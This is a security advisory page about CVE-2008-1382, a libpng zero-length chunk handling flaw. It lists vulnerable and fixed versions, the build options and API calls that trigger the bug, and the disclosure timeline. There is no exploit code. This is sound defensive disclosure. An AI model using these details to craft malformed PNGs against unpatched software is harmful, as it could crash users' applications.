Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2008-1382 to a friend New vulnerability? New tool? Tell us	CVE-2008-1382 libpng Zero-Length Chunks Incorrect Handling     Credit: The information has been provided by Andrea Barisani. The original article can be found at: http://www.ocert.org/advisories/ocert-2008-003.html Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2008-1382 Details Check for CVE-2008-1382 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * libpng-1.0.6 through 1.0.32  * libpng-1.2.0 through 1.2.26  * libpng-1.4.0beta01 through libpng-1.4.0beta19 All these versions in the case that they were built with PNG_READ_UNKNOWN_CHUNKS_SUPPORTED or PNG_READ_USER_CHUNKS_SUPPORTED (default configuration) Immune Systems:  * libpng version 1.2.27  * libpng version 1.0.33  * libpng version 1.2.27beta01 Technical Details: The bug exists in all libpng versions since 1.0.6. It only manifests itself when all three of the following conditions exist: 1. The application is loaded with libpng-1.0.6 through 1.0.32, libpng-1.2.0 through 1.2.26, or libpng-1.4.0beta01 through libpng-1.4.0beta19, and 2. libpng was built with PNG_READ_UNKNOWN_CHUNKS_SUPPORTED or with PNG_READ_USER_CHUNKS_SUPPORTED (both are active in default libpng installations), and 3. the application includes either a call to png_set_read_user_chunk_fn(png_ptr, user_ptr, callback_fn) or a call to png_set_keep_unknown_chunks(png_ptr, keep, list, N) with keep = PNG_HANDLE_CHUNK_IF_SAFE (2) or keep = PNG_HANDLE_CHUNK_ALWAYS (3) It is believed that this is a rare circumstance. It occurs in "pngtest" that is a part of the libpng distribution, in pngcrush, and in recent versions of ImageMagick (6.2.5 through 6.4.0-4). The vendor of the library is not currently aware of any other vulnerable applications. When an application with the bug is run, libpng will generate spurious warning messages about a CRC error in the zero-length chunk and an out-of-memory condition, unless warnings are being suppressed. There is not actually a memory overflow, but the NULL pointer returned from the memory allocator when it tries to generate a zero-length buffer for the chunk data triggers the warning. Later, there may be an error when the application tries to free the non-existent buffer. This has been observed to cause a segmentation violation in pngtest. CVE Information: CVE-2008-1382 Disclosure Timeline: 2008-04-05: Contacted libpng maintainers 2008-04-05: Vendor confirms 2008-04-05: Verification of vendor suggested patch 2008-04-12: libpng-1.2.27beta01 released 2008-04-12: libpng project advisory released 2008-04-12: Advisory release  Comments on CVE-2008-1382:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®